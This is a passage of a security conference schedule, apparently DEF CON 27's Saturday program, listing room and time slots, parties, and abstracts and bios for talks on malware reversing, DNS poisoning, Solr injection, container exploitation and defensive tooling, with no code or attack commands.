BHV - Planet Hollywood - Melrose 1-3 Rooms - cont...(17:30-18:15) - Liven Up - Rachel Smith
BHV - Planet Hollywood - Melrose 1-3 Rooms - (18:15-18:59) - Getting access to your heart's data - Marie Moe
LBV - Flamingo - Carson City II Room - The Human Body's Promise: How Your Bare Hands can Defeat Physical Security -
Night Life - Planet Hollywood - Mezzanine Stage - H@ck3r Runw@y -
PHVT - Bally's - Indigo Tower - 26th Floor - Leveraging Passive Network Mapping with Raspberry Pi and Python - Chet Hosmer
RTV - Flamingo 3rd Floor - Laughlin I,II Rooms - cont...(17:30-18:30) - Casting with the Pros: Tips and Tricks for Effective Phishing - Nathan Sweaney
SEV - Bally's Jubilee Tower - 3rd Floor - (18:15-18:45) - The Voice Told Me To Do It - Daniel Isler
SEV - Bally's Jubilee Tower - 3rd Floor - (18:50-19:20) - The Aspie's Guide to Social Engineering Your Way Through Life - Perry Carpenter
WS - Flamingo - Lower Level - Lake Mead I - cont...(14:30-18:30) - scapy_dojo_v_1 - Hugo Trovao, Rushikesh D. Nandedkar
WS - Flamingo - Lower Level - Lake Mead II - cont...(14:30-18:30) - Modern Debugging^HWarfare with WinDbg Preview - Chris Alladoum, Axel Souchet
WS - Flamingo - Lower Level - Valley of Fire I - cont...(14:30-18:30) - Hack to Basics - x86 Windows Based Buffer Overflows, an introduction to buffer overflows. - Dino Covotsos
WS - Flamingo - Lower Level - Valley of Fire II - cont...(14:30-18:30) - Pentesting ICS 102 - Alexandrine Torrents, Arnaud Soullié

 

Saturday - 19:00


Return to Index  -  Locations Legend
BHV - Planet Hollywood - Melrose 1-3 Rooms - Digital Medicine 101 - Jen Goldsack
Meetups - Planet Hollywood - London Club - (19:30-25:59) - Hacker Flairgrounds -
Night Life - Paris - Concorde C Ballroom - (19:30-25:59) - Hacker Karaoke -
Night Life - Paris - Lobby Bar, under the blue thing - Dallas Hackers Party -
PHVT - Bally's - Indigo Tower - 26th Floor - The Cyberlous Mrs. Maisel: A Comedic (and slightly terrifying) Introduction to Information Warfare - Jessica "Zhanna" Malekos Smith
SEV - Bally's Jubilee Tower - 3rd Floor - cont...(18:50-19:20) - The Aspie's Guide to Social Engineering Your Way Through Life - Perry Carpenter

 

Saturday - 20:00


Return to Index  -  Locations Legend
DC - Planet Hollywood - Firesides Lounge - Meet the EFF - Meetup Panel - Kurt Opsahl, Camille Fischer, Bennett Cyphers, Nathan 'nash' Sheard, Shahid Buttar
Meetups - Planet Hollywood - London Club - cont...(19:30-25:59) - Hacker Flairgrounds -
Night Life - Paris - Concorde C Ballroom - cont...(19:30-25:59) - Hacker Karaoke -
Night Life - Paris - Lobby Bar, under the blue thing - cont...(19:00-21:59) - Dallas Hackers Party -
Night Life - Planet Hollywood - Mezzanine Stage - Hacker Jeopardy -
Night Life - Planet Hollywood - Suite TBA - DC801 Party -

 

Saturday - 21:00


Return to Index  -  Locations Legend
DC - Planet Hollywood - Firesides Lounge - cont...(20:00-21:59) - Meet the EFF - Meetup Panel - Kurt Opsahl, Camille Fischer, Bennett Cyphers, Nathan 'nash' Sheard, Shahid Buttar
Meetups - Planet Hollywood - London Club - cont...(19:30-25:59) - Hacker Flairgrounds -
Night Life - Paris - Chateau Nightclub - DEFCON Monero Party -
Night Life - Paris - Concorde C Ballroom - cont...(19:30-25:59) - Hacker Karaoke -
Night Life - Paris - Lobby Bar, under the blue thing - cont...(19:00-21:59) - Dallas Hackers Party -
Night Life - Paris - Rivoli A Ballroom - (21:30-25:59) - Arcade Party -
Night Life - Paris - Rivoli B Ballroom - 303/Skytalks Party -
Night Life - Planet Hollywood - Apex Suite - Car Hacking Village Party -
Night Life - Planet Hollywood - Gallery Nightclub - Music - Kampf - Kampf
Night Life - Planet Hollywood - Mezzanine Stage - cont...(20:00-21:59) - Hacker Jeopardy -
Night Life - Planet Hollywood - Suite TBA - cont...(20:00-24:59) - DC801 Party -
Night Life - TBA - IoT Village Party -

 

Saturday - 22:00


Return to Index  -  Locations Legend
DC - Planet Hollywood - Firesides Lounge - (22:15-22:59) - We Hacked Twitter… And the World Lost Their Sh*t Over It! - Mike Godfrey, Matthew Carr
Meetups - Planet Hollywood - London Club - cont...(19:30-25:59) - Hacker Flairgrounds -
Night Life - Paris - Chateau Nightclub - cont...(21:00-26:59) - DEFCON Monero Party -
Night Life - Paris - Concorde C Ballroom - cont...(19:30-25:59) - Hacker Karaoke -
Night Life - Paris - Rivoli A Ballroom - cont...(21:30-25:59) - Arcade Party -
Night Life - Paris - Rivoli B Ballroom - cont...(21:00-25:59) - 303/Skytalks Party -
Night Life - Planet Hollywood - Apex Suite - cont...(21:00-25:59) - Car Hacking Village Party -
Night Life - Planet Hollywood - Gallery Club - GothCON party -
Night Life - Planet Hollywood - Gallery Nightclub - Music - Icetre Normal - Icetre Normal
Night Life - Planet Hollywood - Mezzanine Stage - Drunk Hacker History -
Night Life - Planet Hollywood - Suite TBA - cont...(20:00-24:59) - DC801 Party -
Night Life - TBA - cont...(21:00-24:30) - IoT Village Party -

 

Saturday - 23:00


Return to Index  -  Locations Legend
Meetups - Planet Hollywood - London Club - cont...(19:30-25:59) - Hacker Flairgrounds -
Night Life - Paris - Chateau Nightclub - cont...(21:00-26:59) - DEFCON Monero Party -
Night Life - Paris - Concorde C Ballroom - cont...(19:30-25:59) - Hacker Karaoke -
Night Life - Paris - Rivoli A Ballroom - cont...(21:30-25:59) - Arcade Party -
Night Life - Paris - Rivoli B Ballroom - cont...(21:00-25:59) - 303/Skytalks Party -
Night Life - Planet Hollywood - Apex Suite - cont...(21:00-25:59) - Car Hacking Village Party -
Night Life - Planet Hollywood - Gallery Club - cont...(22:00-25:59) - GothCON party -
Night Life - Planet Hollywood - Gallery Nightclub - Music - Scotchandbubbles - Scotchandbubbles
Night Life - Planet Hollywood - Mezzanine Stage - cont...(22:00-23:59) - Drunk Hacker History -
Night Life - Planet Hollywood - Suite TBA - cont...(20:00-24:59) - DC801 Party -
Night Life - TBA - cont...(21:00-24:30) - IoT Village Party -

 

Saturday - 24:00


Return to Index  -  Locations Legend
Meetups - Planet Hollywood - London Club - cont...(19:30-25:59) - Hacker Flairgrounds -
Night Life - Paris - Chateau Nightclub - cont...(21:00-26:59) - DEFCON Monero Party -
Night Life - Paris - Concorde C Ballroom - cont...(19:30-25:59) - Hacker Karaoke -
Night Life - Paris - Rivoli A Ballroom - cont...(21:30-25:59) - Arcade Party -
Night Life - Paris - Rivoli B Ballroom - cont...(21:00-25:59) - 303/Skytalks Party -
Night Life - Planet Hollywood - Apex Suite - cont...(21:00-25:59) - Car Hacking Village Party -
Night Life - Planet Hollywood - Gallery Club - cont...(22:00-25:59) - GothCON party -
Night Life - Planet Hollywood - Gallery Nightclub - Music - Acid-T A.K.A. DJ SmOke - Acid-T A.K.A. DJ SmOke
Night Life - Planet Hollywood - Suite TBA - cont...(20:00-24:59) - DC801 Party -
Night Life - TBA - cont...(21:00-24:30) - IoT Village Party -

 

Saturday - 25:00


Return to Index  -  Locations Legend
Meetups - Planet Hollywood - London Club - cont...(19:30-25:59) - Hacker Flairgrounds -
Night Life - Paris - Chateau Nightclub - cont...(21:00-26:59) - DEFCON Monero Party -
Night Life - Paris - Concorde C Ballroom - cont...(19:30-25:59) - Hacker Karaoke -
Night Life - Paris - Rivoli A Ballroom - cont...(21:30-25:59) - Arcade Party -
Night Life - Paris - Rivoli B Ballroom - cont...(21:00-25:59) - 303/Skytalks Party -
Night Life - Planet Hollywood - Apex Suite - cont...(21:00-25:59) - Car Hacking Village Party -
Night Life - Planet Hollywood - Gallery Club - cont...(22:00-25:59) - GothCON party -
Night Life - Planet Hollywood - Gallery Nightclub - Music - Clockwork Echo - Clockwork Echo

 

Saturday - 26:00


Return to Index  -  Locations Legend
Night Life - Paris - Chateau Nightclub - cont...(21:00-26:59) - DEFCON Monero Party -

Talk/Event Descriptions


 

DC - Paris - Track 4 - Saturday - 15:00-15:45


.NET Malware Threats: Internals And Reversing

Saturday at 15:00 in Track 4
45 minutes

Alexandre Borges Security Researcher at Blackstorm Security

.NET malware is well-known by security analysts, but even existing many tools such as dnSpy,.NET Reflector, de4dot and so on to make the analysis easier, most professionals have used them as a black box tool, without concerning to .NET internals, structures, MSIL coding and details. In critical cases, it is necessary have enough knowledge about internal mechanisms and to debug these .NET threats using WinDbg.

Unfortunately, .NET malware samples have become very challenger because it is so complicated to deobfuscated associated resources, as unpacking and dumping them from memory. Furthermore, most GUI debugging tools does an inside view of mechanisms such as CRL Loader, Managed Heap, Synchronization issues and Garbage Collection.

In the other side, .NET malware threats are incredibly interesting when analyzed from the MSIL instruction code, which allows to see code injections using .MSIL and attempts to compromise .NET Runtime keep being a real concern.

The purpose of this presentation is to help professionals to understand .NET malware threats and techniques by explaining concepts about .NET internals, mechanisms and few reversing techniques.

Alexandre Borges
Alexandre Borges is a Security Researcher, who has been daily working on Reverse Engineering and Digital Forensic Analysis for many years. He has taught training courses about Malware and Memory Analysis, Digital Forensics Analysis and Mobile Forensics around the world. Furthermore, Alexandre is the creator and maintener of Malwoverview triage tool: https://github.com/alexandreborges/malwoverview.

Alexandre has spoken in several conferences such as DEF CON USA (2018), DEF CON CHINA (2019), CONFidence Conference 2019, HITB 2019 Amsterdam, H2HC Conference (2015/2016), BSIDES Sao Paulo (2019/2018/2017/2016) and BHACK Conference (2018).

Finally, it is a referee of Digital Investigation:The International Journal of Digital Forensics & Incident Response (https://www.journals.elsevier.com/digital-investigation/editorial-board)

Twitter: @ale_sp_brazil
LinkedIn: http://www.linkedin.com/in/aleborges
Website: http://www.blackstormsecurity.com/bs/en/en_articles.html, Tool: https://github.com/alexandreborges/malwoverview


Return to Index    -    Add to    -    ics Calendar file

 

PHVT - Bally's - Indigo Tower - 26th Floor - Saturday - 12:00-12:59


"First-Try" DNS Cache Poisoning with IPv4 and IPv6 Fragmentation

Travis Palmer, Security Research Engineer at Cisco
Brian Somers, Site Reliability Engineer at Cisco

DNS fragmentation attacks are a more recent series of cache poisoning attacks on resolvers. Even if DNSSEC is fully implemented, an attacker can still poison various unsigned records in the response. These types of attacks are difficult but have been considered feasible over IPv4, but impossible over IPv6. Unfortunately, changes to the Linux kernel have made the entropy limiting this attack inferable off-path, poisoning on the first iteration is now possible. This talk will cover how this attack is carried out, and mitigations that can be put in place by operators of DNS servers to limit its effectiveness.

Travis (Travco) Palmer is a Security Research Engineer at Cisco. Travis is a certified OSCP and OSCE who has been getting paid to either fix or break something for over seven years. He is a fan (and sometimes-contributer) of a number of simulator/sandbox video games, and keeper of too many unfinished hardware projects.

Brian Somers is a Site Reliability Engineer for Cisco Umbrella (formerly OpenDNS). He specializes in large scale development on Unix-like platforms, software design & architecture, low level C development, and FreeBSD development.


Return to Index    -    Add to    -    ics Calendar file

 

PHVT - Bally's - Indigo Tower - 26th Floor - Saturday - 16:00-16:59


(Re)Thinking Security Given the Spectre of a Meltdown (hold my beer)

Jeff Man, InfoSec Curmudgeon

Have you ever noticed that much of the mission of cyber- and information security professionals seems to be focused on vulnerabilities? Have you ever heard of the risk equation? Perhaps you are familiar with one or more versions that help you derive the risk to your organization (sometimes referred to as residual risk). I have been wondering for a while how to suggest to our industry that there is perhaps TOO much focus on vulnerabilities and not enough attention or focus on the other elements that derive the standard risk equation. The recent disclosure of Meltdown/Spectre introduced a "perfect storm" scenario where the vulnerability wasn't easy to patch or fix, and the solution seemed to be break things. This created a situation where the "security solution" wasn't simply to apply the patch - and that left many organizations scrambling to figure out how to deal with this example of a persistent vulnerability. This is a great example of what I've wanted to discuss for a while - what else should we focus on in terms of security if/when the vulnerabilities still remain. Interested? Intrigued? Come join the discussion!

Jeff Man (Twitter: @MrJeffMan) is an infosec curmudgeon.


Return to Index    -    Add to    -    ics Calendar file

 

Night Life - Paris - Rivoli B Ballroom - Saturday - 21:00-25:59


Title:
303/Skytalks Party

A repeat favorite of DEF CON attendees, with DJ's from across the community as well as creative works and technical expertise. What can we say, it's 303!
https://twitter.com/dcskytalks/status/1146527983588401158

Return to Index    -    Add to    -    ics Calendar file

 

AVV - Bally's Event Center - Saturday - 11:00-11:59


A hackers first solo: airplane avionics security 101

No description available


Return to Index    -    Add to    -    ics Calendar file

 

RGV - Flamingo - 3rd Floor - Carson City II - Saturday - 14:00-14:59


Title:
A Life of Advantage Play

J.R. from Four Suits will interview rx gamble, a professional gambler who has earned her living beating casinos. An advantage player, she is focused on finding the flaws and gaps in casino game procedures that allow the careful player to gain an edge. With thousands of hours spent on games like poker, blackjack, and more, she will discuss some of the physical techniques, psychological ploys, and oddities of casino history that make it possible to beat the odds.
Return to Index    -    Add to    -    ics Calendar file

 

RCV - Planet Hollywood - Celebrity 5 Ballroom - Saturday - 12:30-13:05


LIVE TOOL DEMO

“Can you add a conference line, please?” - Using Cloud Services for Dial-In Reconnaissance Automation

1230 - 1305

Alina Dorina


Return to Index    -    Add to    -    ics Calendar file

 

ICS - Bally's Event Center - Saturday - 14:00-14:30


Abusing the IoT in Smart Buildings

August 10, 2019 2:00 PM

Building Automation Systems control functions such as air conditioning, access control, and video surveillance in critical facilities such as data centers and airports. With the advent of the IoT, sensors, controllers and many other devices (e.g., surveillance cameras) are available in consumer shops and are being integrated into new and existing smart buildings. These devices are much cheaper than industrial controllers and far easier to install, but they often lack security features and vulnerabilities are discovered with increasing frequency. In addition, bad security practices such as simple or default credentials, unencrypted traffic and lack of network segmentation remain common. In this presentation, we discuss the results of research conducted at Forescout in the past 2 years, including: an analysis of the security landscape for smart buildings with industrial controllers and IoT devices; the development of a proof-of-concept malware using newly discovered and previously known vulnerabilities; and a description of how this can be used by malicious actors in emerging attack scenarios.

Speaker Information

Panelist Information

Daniel dos Santos

Forescout

Daniel dos Santos holds a PhD in computer science from the University of Trento and has experience in security consulting and research. He is a researcher at Forescout, focusing on vulnerability research and the development of innovative features for network security monitoring.


Return to Index    -    Add to    -    ics Calendar file

 

PHVW - Bally's - Indigo Tower - 26th Floor - Saturday - 16:00-17:59


Advanced APT Hunting with Splunk

John Stoner, Principal Security Strategist, Splunk
Ryan Kovar, Principal Security Strategist, Splunk

You wanna learn how to hunt the APTs? This is the workshop for you. Using a real-worldish dataset, this workshop will teach you how to hunt the “fictional” APT group Taedonggang. We discuss the Diamond model, hypothesis building, LM Kill Chain, and Mitre ATT&CK framework and how these concepts can frame your hunting. Using the freely available version of Splunk and OSINT, we will hunt for APT activity riddling a small startup's network. During the event, you will be presented a hypothesis and conduct your own hunts, whether it is for persistence, exfiltration, c2 or other adversary tactics. Heck, there might be some PowerShell to be found, too. We will regroup and review the specific hunt and discuss findings and what opportunities we have to operationalize these findings as well. At the end, we give you a dataset and tools to take home and try newly learned techniques yourself.

John Stoner (Twitter: @stonerpsu) is a Principal Security Strategist at Splunk where he enjoys writing, problem solving and building stuff. When not doing cyber things, you can find him reading or binge watching TV series that everyone else has already seen.

Ryan Kovar fought in the cyberwars and has been doing cybery things for almost 20 years. Now he is a Principal Security Strategist at Splunk building cool stuff, talking about security thingies, and helping other people fight their battles. He hates printers.


Return to Index    -    Add to    -    ics Calendar file

 

CPV - Planet Hollywood - Celebrity 1,2 Ballrooms - Saturday - 14:00-13:59


Adversarial Fashion – Sartorial Hacking to Combat Surveillance

No description available


Return to Index    -    Add to    -    ics Calendar file

 

BTVT - Flamingo - 3rd Floor- Savoy Room - Saturday - 14:00-14:59


Anatomy Of A Megabreach: Equifax Report

Saturday 14:00, Savoy Ballroom, Flamingo (Blue Team Village) (1H)

@uncl3dumby is enamored with defense and protective thinking. My career has focused on security operations, but I love understanding the way systems operate. I'm passionate about investigating root cause of incidents, or how things came to be the way they are. Security is a full-stack, cross discipline field and I love learning about and digging into it all!

Following testimony in Congress and a lengthy investigation of the Equifax breach in 2016, U.S. House of Representatives drafted a report. The report is AMAZING! It includes details of Equifax corporate structure, IT infrastructure, and covers timelines and minutiae of the breach itself. It has information that is extremely interesting and useful for security practitioners, but we might not all have the time or interest to wade through 97 pages of deep information. I did that for you! My talk is a comprehensive review of the report that covers everything I considered interesting or important.


Return to Index    -    Add to    -    ics Calendar file

 

DC - Paris - Track 4 - Saturday - 16:30-16:50


Apache Solr Injection

Saturday at 16:30 in Track 4
20 minutes | Demo, Exploit

Michael Stepankin Security Researcher at Veracode

Apache Solr is a search platform used by many enterprise companies to add a full text search functionality to their websites. Often hidden behind firewalls, it provides a rich API to search across large datasets. If this API is used by web applications in a wrong way, it may open a possibility for injection attacks to completely modify the query logic.

In this talk we’ll shed some light on the new type of vulnerabilities for web applications - Solr parameter injection, and provide some useful ways how to achieve remote code execution through it. We also provide exploits for almost all known vulnerabilities for Apache Solr, including the two new RCEs we reported this year.

Michael Stepankin
Michael Stepankin is a Security Researcher at Veracode. He works on bringing new detection features to Veracode’s dynamic and static scanner engines. As a passionate hacker, he loves to hack enterprise java applications by day and write beautiful JavaScript code by night. Listed in Halls of Fame of various bug bounty programs, Michael has also worked as a penetration tester for many years.

Twitter: @artsploit


Return to Index    -    Add to    -    ics Calendar file

 

CLV - Flamingo 3rd Floor - Reno I Room - Saturday - 10:40-11:20


Speaker: Ayman Elsawah

Twitter: @coffeewithayman

Abstract: In this talk I am going to walk through how we can use pareto's principle to secure all our AWS accounts. What this means is with just 20% of effort, we can accomplish 80% security of our AWS accounts. We will be leveraging the power of AWS Organizations and IAM to accomplish our goals. This will be a technical talk and guide on how to secure your account.

This talk assumes you have secured your individual AWS accounts at the basic level by locking down your root accounts with 2FA, and etc.

About Ayman: Ayman Elsawah is a veteran Information Security Professional and Educator having worked in a variety of industries including Financial, Social Media, Global E-Commerce, Silicon Valley Startups, and the Movie/Entertainment Industry. An early user of AWS, Ayman specializes in AWS Security and helps companies operationalize their presence in the cloud and take their security maturity to the next level. He has built custom tools internally for organizations with hundreds of AWS accounts helping streamline their operations. His specializations are in Centralized Log Management and Identity and Access Management (IAM). He is also the host of the Getting Into Infosec Podcast and author of a book Breaking IN: A Practical Guide to Starting a Career In Information Security. He loves teaches others about Information Security and Cloud.


Return to Index    -    Add to    -    ics Calendar file

 

Night Life - Paris - Rivoli A Ballroom - Saturday - 21:30-25:59


Title:
Arcade Party

Relive once again the experience of the arcade at DEF CON. From classics to a custom built 16 player foosball table! Jam out to DJ Keith Myers while taking another swipe at that high score on your favorite classic video games. No quarters required! This party is open to all DEF CON 27 Attendees. Registration is not required. This EPIC party is sponsered by: SCYTHE, GRIMM, ICS Vilage, DRAGOS, and Bugcrowd
Arcade Party

Return to Index    -    Add to    -    ics Calendar file

 

RTV - Flamingo 3rd Floor - Laughlin I,II Rooms - Saturday - 13:00-13:59


BadSalt (Adversarial DevOps)

SaltStack is robust configuration management utility used by many to achieve DevOps related initiatives in their organizations. Thanks to its open source model, SaltStack can be used by both hobbyist, hackers, and corporations alike. Like any open source tool suite out there, that also means individuals with adversarial intent, be it professional, or malicious, can also take advantage of this tool. In its most simple case, SaltStack can be used by an adversary as a simple Command and Control server (C2 server). However, if SaltStack is used as intended, an educated adversary can easily turn salt “bad” in more ways than simple command and control.
By re-configuring and automating basic settings within the Salt Master and Salt Minion configurations, it is easy to deploy SaltStack across many systems for any scenario. Coupling this ease of deployment with a basic understanding of configuration management, and scripted stagers, the result is a powerful post-exploitation framework with a built in C2 server, that is simply just SaltStack, but in use by an adversary. There are many benefits for using such a tool suite from an adversarial perspective such as, easily bypassing AV with trusted Salt Minions, and taking advantage of the desired state configurations to build out robust, scalable, post exploitation persistence modules.
Part of the research conducted was not just on how an adversary might use SaltStack, but also on how they might target a SaltStack environment. Man in the middle attacks are a concerning attack vector against Salt Minions at the time of this research. SaltStack has strong protections against this, but they are not enabled by default due to the need of manually distributing a unique public key. It is up to the individual(s) deploying SaltStack to be sure they enabled the proper security features to be safe from these attacks. Fortunately, SaltStack does have a few compensating controls that make this less likely after a successful deployment, but it is important that all SaltStack users are made aware of the importance and impact that just one particular setting can have on their infrastructure. Fortunately methods of detecting this activity are clear and well documented, but unfortunately a successful attack usually means root access on the target which could result in an adversary clearing their tracks. This could make it difficult to perform root cause analysis unless network traffic was analyzed at the time of the event.
The overall goal of this research is to show how advances in tools for perfectly legitimate Information Technology initiatives, like DevOps, can be turned into sophisticated tool suites for attackers. In true hacker spirit, this technology can be used for completely unintended purposes. This presentation will provide the insight to how SaltStack could be attacked or used in an adversarial context, and also how those attacks or uses could be detected and prevented.

About Casey Erdmann: Casey Erdmann, also known as 3ndG4me by his CTF team mates and online social communities, is an avid offensive security nerd. Casey is 23 years old, and has a love for CTFs and application security. He is the co-founder of DC706, and is active in his local computer security community. Casey has been responsible for implementing infrastructure for local high-school CTF competitions, and coaching his local university’s SECCDC team. Casey is also responsible for developing the OpenVPN Connect module for the WiFi Pineapple, as well as Propane King of the Hill, a NetKotH rewrite inspired by members of DC 404. When he isn’t writing neat tools, or reaching out to his local community, Casey spends about 90% of his free time researching the latest offensive security news/techniques and playing CTFs trying to “get good”, with the other 10% being writing music, playing video games, or optional sleep. Twitter: @3ndG4me_


Return to Index    -    Add to    -    ics Calendar file

 

DL - Planet Hollywood - Sunset 6 - Saturday - 12:00 - 13:50


bedr

Saturday from 12:00 – 13:50 in Sunset 6 at Planet Hollywood
Audience: Defense, Linux

Mark Ignacio

bedr is a Linux syscall monitor that uses Berkeley Packet Filters that hook via kernel tracepoints. It collects the holy trinity of EDR data - proc events, filemods, and netconns – and ships them off to somewhere else for off-machine detection and response. Basically, it’s half of what you need to make an EDR!

https://github.com/mark-ignacio/bedr

Mark Ignacio
Mark is a security engineer that does operating system security things on Windows and Linux. He likes coding in Go a lot and is a consistent believer that this year will be the Year of Linux on the Desktop.


Return to Index    -    Add to    -    ics Calendar file

 

RTV - Flamingo 3rd Floor - Laughlin I,II Rooms - Saturday - 10:30-11:30


Breaking NBAD and UEBA Detection

Network Behavior Anomaly Detection (NBAD) and User and Entity Behavior Analytics (UEBA) are heralded as machine learning fueled messiahs for finding advanced attacks. The data collection and processing methodologies of these approaches create a series of new exploitable vectors that can allow attackers to navigate network and systems undetected. In this session, methods for poisoning data, transforming calculations and preventing alerts will be examined. Proof of concept Python code will be demonstrated and made available. Approaches to harden against these attacks will also be discussed as well as outlining needed changes in detection standards.

About Charles: WitFoo Chief Technology Officer - Charles’ dedication to maturing the craft of InfoSec is built on a diverse career path across the industry. He started his career in InfoSec in the US Navy in 2002 serving as the Network Security Officer at the US Naval Postgraduate School. After leaving active duty, he was a contributing product reviewer for InfoWorld magazine focusing on network security products. Charles spent 7 years running Herring Consulting, a company dedicated to process orchestration, data sharing, and marketing. In 2012, Charles joined the Lancope team as a pre-sales engineer, promoted to Consulting Security Architect and later as Strategic Account Manager following the acquisition of Lancope by Cisco. In 2014, Charles partnered with veterans of the military, law enforcement and cybersecurity to research new approaches to improve the craft of cybersecurity operations. In 2016, that research resulted in the forming of WitFoo. When not working with cybersecurity heroes, Charles enjoys SCUBA divining with his wife, Mai. Twitter: @charlesherring


Return to Index    -    Add to    -    ics Calendar file

 

CLV - Flamingo 3rd Floor - Reno I Room - Saturday - 10:00-10:40


Speaker: Chris Le Roy

Twitter: @brompwnie

Abstract: Containers,Cloud,DevOps and SDLC are all terms that are increasing in terms of usage in the InfoSec world. In this talk, we discuss how a container exploitation tool (BOtB) was developed to identify and autopwn common vulnerabilities in container technologies such as Docker and LXC and how this tool was used in a modern SDLC environment using common CI/CD technologies to identify, exploit and remediate container vulnerabilities before releases were made to production.

In this talk we elaborate on how and why BOtB was built to be used by pentesters to exploit container vulnerabilities and how BOtB can be used by engineers to secure their container environments. The talk will also explain the technical details around the vulnerabilities that can be exploited by BOtB.

About Chris: Chris is a security researcher based in London. He has not had an unusual entrance to infosec coming from a Computer Science background which led him to dabble in software development for sometime. This resulted in Chris realising he is a terrible dev and prefers breaking things which led him to breaking things full-time. The breaking of things full-time has allowed Chris to share his ramblings at multiple conferences in the USA and Europe.


Return to Index    -    Add to    -    ics Calendar file

 

BHV - Planet Hollywood - Melrose 1-3 Rooms - Saturday - 16:45-17:30


4:45 PM: Building a New Decentralized Internet, With the Nodes Implanted in Our Bodies
Speaker: Nick Titus + Zac Shannon + Mixl S. Laufer

Abstract: The internet is broken. It's vulnerable to manipulation, censorship, shutdowns, surveillance, and on top of all that, it costs to access it. What if we could bypass all that? The PirateBox platform with its meshing capability creates this possibility, but somehow has gained little traction. If every WiFi enabled device just became a node on a mesh network, we would have a replacement for the hardware layer of the internet. To show how powerful this platform can be, and take it to the next level, we have created the PegLeg, an implanted cybernetic enhancement that turns the user into an anonymized local area network on which people can chat and share files anonymously, as well as mesh with other nearby networks. The PegLeg differs from a wearable, as it cannot be confiscated, and has no battery. Come learn how you can turn your phone, laptop, raspberry pi, or router into a meshing piratebox, and build a new internet. And if you are really committed, you can build the implant yourself, and be a walking pirate server with a PegLeg.
Speaker Bio:

Nick Titus invented his first assistive device in high school. This open source wearable electrically simulated a patient's muscles to move in accordance with mental commands transmitted by an EEG headset. After winning most innovative hardware at Tech Crunch NYC 2017 and sharing his story at TedxCU, Nick leaned into the biohacking movement as a whole. He has since focused his efforts on leveraging emerging technology to address overlooked challenges in all aspects of biology. He now lives in Boulder, CO where he collaborates on multiple humanitarian-driven biotech projects.

Zac Shannon is too cool to brag about all the awesome things he's done, but he did take care of porting the operating system, and the meshing of the PirateBox platform for the PegLeg, as well as segregating the file system from the OS, so that the machine will not brick even in the case of a corrupted file system created from a hard shut down.

Mixl S. Laufer worked in mathematics and high energy physics until he decided to use his background in science to tackle problems of world health and other social issues. Perpetually disruptive, his flagship project makes it possible for people to manufacture their own medications at home. Open-source, and made from off-the-shelf parts, the Apothecary MicroLab puts many medications within the reach of those who would otherwise not have them. The project which garnered his group the most press was the EpiPencil, an open-source version of the EpiPen which costs only $30 to produce, and $3 to refill.

Return to Index    -    Add to    -    ics Calendar file

 

DL - Planet Hollywood - Sunset 1 - Saturday - 12:00 - 13:50


Burp Plugin: Cyber Security Transformation Chef (CSTC)

Saturday from 12:00 – 13:50 in Sunset 1 at Planet Hollywood
Audience: Offense, Defense, AppSec, Mobile.

Ralf Almon & Sebastian Puttkammer

CSTC is a Burp Suite extension for various input transformations. It implements a generic solution that can replace numerous specialized extensions. The CSTC solves the problem of having too specific burp plugins by being a more generic problem solving tool. It contains a wide range of very simple operations that can be chained into complex transformations. This allows a penetration tester to create the exact transformation they need to test a specific product without having to write any code. As we all know, writing code and setting everything up is time consuming. You can configure complex input transformations for both requests and responses simply by using drag and drop. You can calculate HMACs for parts of the request, refresh timestamps, update sequence numbers or encrypt parts of the request. You can chain together different operations to create more complex transformations. You could extract parts of the request, decompress them, insert your payload using the repeater or utilizing the scanner and put it back in and compress it again before sending it. Since there are already many basic operations implemented, you can easily focus on testing the application instead of searching for extensions performing such transformations.

https://github.com/usdag/cstc

Ralf Almon
Ralf Almon is a Security Analyst with years of experience in penetration testing. He works at usd AG in Germany and holds a master’s degree in Information Security from TU Darmstadt. He gained a lot of industry knowledge working as a consultant in various industries ranging from aerospace and aviation to the finance sector.

Sebastian Puttkammer
Sebastian Puttkammer is a Security Analyst working for usd AG in Germany. His main interests are network/web app security and reverse engineering. He holds a master’s degree in computer science from TU Darmstadt. He is currently in charge of the Code Review Team at usd AG and performs black-box and white-box pentests.


Return to Index    -    Add to    -    ics Calendar file

 

PHVW - Bally's - Indigo Tower - 26th Floor - Saturday - 09:00-10:59


Burp Suite Workshop

Sunny Wear, Nestor Torres

Gain hands-on experience with Burp Suite in this four-hour workshop with the author of the Burp Suite Cookbook, Sunny Wear. You will learn how to use Burp Suite to hone your web application penetration testing skills. Each student receives a virtualized environment complete with a copy of Burp Suite and a vulnerable web application to hack. Lessons covered in the workshop include Burp configuration settings, Injections attacks such as Cross-site Scripting and SQL Injection attacks, automated attacks using Intruder, recommended BApp extensions and their uses, and finally, how to build and use Burp Macros.

Sunny Wear (Twitter: @SunnyWear) is an Application Security Architect and Web Application Penetration Tester. Her breadth of experience includes network, data, application and security architecture as well as programming across multiple languages and platforms. She is the author of several security-related books including her most recent, Burp Suite Cookbook, assists pentesters and programmers in more easily finding vulnerabilities within applications while using Burp Suite. She conducts security talks and classes locally and at conferences like BSides Tampa, BSides Orlando, AtlSecCon, Hackfest CA, and BSides Springfield.

Nestor Torres (Twitter: @N3S____) is a security analyst working closely with developers to pentest and fix their Web Applications. He is passionate about helping others and teaching others who are hungry for learning cybersecurity. Some of his hobbies involve building labs for vulnerability testing and setting up small to medium enterprise network.


Return to Index    -    Add to    -    ics Calendar file

 

DL - Planet Hollywood - Sunset 1 - Saturday - 14:00 - 15:50


Burpsuite Team Server for Collaborative Web App Testing

Saturday from 14:00 – 15:50 in Sunset 1 at Planet Hollywood
Audience: Offense, AppSec

Tanner Barnes

During large scale engagements against multiple applications teams often split the workload across many testers. Currently, sharing Burpsuite states requires exporting large files that are point in time requiring multiple exports and shares if new developments in engagement occur which restricts the ability for teams to collaborate on an application. With my new Bursuite plugin, coupled with a lightweight server, multiple testers can share traffic in real time across multiple applications allowing for quick collaboration! Have a repeater payload your team needs to see? Simply right click the request and select share to populate their repeater tabs! Need help with a intruder payload? Have another tester create it and send it to you! Come listen and see how this plugin can help your teams hack collaboratively!

https://github.com/Static-Flow/BurpSuite-Team-Extension

Tanner Barnes
Tanner Barnes is a cyber security consultant for AON Cyber Solutions providing full scope security assessment services for clients. When he isn't assessing clients security he's building new tools to help improve the lives of others hackers.


Return to Index    -    Add to    -    ics Calendar file

 

Night Life - Planet Hollywood - Apex Suite - Saturday - 21:00-25:59


Title:
Car Hacking Village Party

Register To Attend

Return to Index    -    Add to    -    ics Calendar file

 

RTV - Flamingo 3rd Floor - Laughlin I,II Rooms - Saturday - 17:30-18:30


Casting with the Pros: Tips and Tricks for Effective Phishing

